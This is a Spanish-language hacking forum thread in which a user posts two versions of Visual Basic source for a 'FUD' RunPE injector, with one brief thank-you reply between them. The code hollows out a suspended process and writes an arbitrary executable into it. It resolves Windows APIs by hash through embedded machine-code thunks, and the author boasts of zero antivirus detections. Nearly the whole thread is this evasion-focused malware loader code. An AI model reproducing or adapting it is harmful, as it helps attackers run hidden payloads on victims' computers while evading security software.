1M3n3g@tt1
Modders
Mensajes : 295 Reputación : 130
Registrado : 24/03/2011
Edad : 42
Localización : System32\M3.exe
Dom Mayo 13, 2012 12:55 pm
Buenas , los dejo a disfrutar ....
- Código:
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37 (http://Servicio-externo.net/reporte.php?id=y4nu_SnKz)
' => Flecha : 13|05|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
Declare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As Any, Optional ByVal B As Long = 1, Optional ByVal c As Long = 1) As Long
Private ASM_GETAPIPTR(170) As Byte
Private ASM_CALLCODE(255) As Byte
Private sMEMORY(40) As Byte
Private sVALUE As Byte
Private IMAGE_DOS_HEADER(65) As Byte
Private IMAGE_NT_HEADERS(256) As Byte
Private IMAGE_SECTION_HEADER(60) As Byte
Private PROCESS_INFORMATION(44) As Byte
Private tCONTEXT(210) As Byte
Private STARTUPINFO(16) As Long
Private sParams As Long
Private ImageBase As Long
Private hProcess As Long
Private hThread As Long
Private SizeOfImage As Long
Private SizeOfHeaders As Long
Private sEntryPoint As Long
Private VirtualAddress As Long
Private sRawDataPoint As Long
Private sRawData As Long
Private Ebx As Long
Private D As Long
Private Z As Long
Private vItem As Variant
Private sSection As Integer
Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
sMEMORY(Z) = vItem
Z = Z + 1
sVALUE = 200 + 48
Next
Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)
Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)
Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))
Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)
Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
Call Invoke("NTDLL", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Invoke("KERNEL32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H3000&, &H40)
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase, sMulDiv(sBytes(0)), SizeOfHeaders, CLng("0"))
For D = 0 To sSection - 1
Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams + sVALUE + 40& * D)), &H64)
Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)
Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase + VirtualAddress, sMulDiv(sBytes(sRawDataPoint)), sRawData, CLng("0"))
Next
Call Invoke("NTDLL", "NtGetContextThread", hThread, sMulDiv(tCONTEXT(CLng("0"))))
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, Ebx + &H4 + &H1 + &H3, sMulDiv(VirtualAddress), &H1 + &H3 + &H2, CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase + sEntryPoint), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)
Call Invoke("NTDLL", "NtSetContextThread", hThread, sMulDiv(tCONTEXT(0)))
Call Invoke("NTDLL", "NtResumeThread", hThread, CLng("0"))
End Function
Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
End Sub
Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
On Error Resume Next
Dim vItem As Variant
Dim sThunk As String
Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
For Each vItem In vParams
sThunk = "68" & GetLng(vItem) & sThunk
Next vItem
Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
Invoke = ExeThunk(VarPtr(ASM_CALLCODE(0)))
End Function
Private Function gHash(strHash) As Long
On Error Resume Next
Dim i As Long
Dim lResult As Long
For i = 1 To Len(strHash)
lResult = CallThunk8(-439163333029263.6533@, lResult)
lResult = lResult + Asc(Mid(strHash, i, 1))
Next i
gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
End Function
Private Function GetLng(ByVal lLng As Long) As String
On Error Resume Next
Dim lTMP As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
End Function
Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
On Error Resume Next
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
Next i
End Sub
Function THUNK_GETAPIPTR() As String
THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
End Function
2N1TRO
Usuario
Mensajes : 31 Reputación : 5
Registrado : 12/05/2012
Dom Mayo 13, 2012 7:01 pm
te guedo genial
gracias por compartir
3M3n3g@tt1
Modders
Mensajes : 295 Reputación : 130
Registrado : 24/03/2011
Edad : 42
Localización : System32\M3.exe
Mar Mayo 15, 2012 9:32 pm
Buenas , los dejo esta version actualizada ( Gracias a LuchoPr por reportar que em XP se ejecutava pero daba error en seguido )
SaludoS
:drinking:
- Código:
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37 (http://Servicio-externo.net/reporte.php?id=y4nu_SnKz)
' => Flecha : 13|05|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
Declare Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any, Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
Private sVALUE As Byte
Private sMEMORY(40) As Byte
Private ASM_GETAPIPTR(170) As Byte
Private ASM_CALLCODE(255) As Byte
Private IMAGE_DOS_HEADER(65) As Byte
Private IMAGE_NT_HEADERS(256) As Byte
Private IMAGE_SECTION_HEADER(60) As Byte
Private PROCESS_INFORMATION(44) As Byte
Private tCONTEXT(210) As Byte
Private STARTUPINFO(16) As Long
Private sParams As Long
Private sImageBase As Long
Private sProcess As Long
Private sThread As Long
Private SizeOfImage As Long
Private SizeOfHeaders As Long
Private sEntryPoint As Long
Private sVirtualAddress As Long
Private sRawData As Long
Private sRawDataPoint As Long
Private sEbx As Long
Private D As Long
Private Y As Long
Private vItem As Variant
Private sSection As Integer
Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
sMEMORY(Y) = vItem
Y = Y + 1
sVALUE = 200 + 48
Next
Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)
Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)
Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)
Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))), sMulDiv(PROCESS_INFORMATION(CLng("0"))))
Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)
Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
For D = 0 To sSection - 1
Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)
Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase + sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))
Next
Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 + &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))
Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)
Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)
Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))
End Function
Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
End Sub
Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
On Error Resume Next
Dim vItem As Variant
Dim sThunk As String
Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
For Each vItem In vParams
sThunk = "68" & GetLng(vItem) & sThunk
Next vItem
Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))
End Function
Private Function gHash(strHash) As Long
On Error Resume Next
Dim i As Long
Dim lResult As Long
For i = 1 To Len(strHash)
lResult = CallThunk8(-439163333029263.6533@, lResult)
lResult = lResult + Asc(Mid(strHash, i, 1))
Next i
gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
End Function
Private Function GetLng(ByVal lLng As Long) As String
On Error Resume Next
Dim lTMP As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
End Function
Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
On Error Resume Next
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
Next i
End Sub
Function THUNK_GETAPIPTR() As String
THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
End Function
Temas similares
Temas similares
Permisos de este foro:
No puedes responder a temas en este foro.
Para ver Todo el contenido del foro es necesario estar Registrado! 
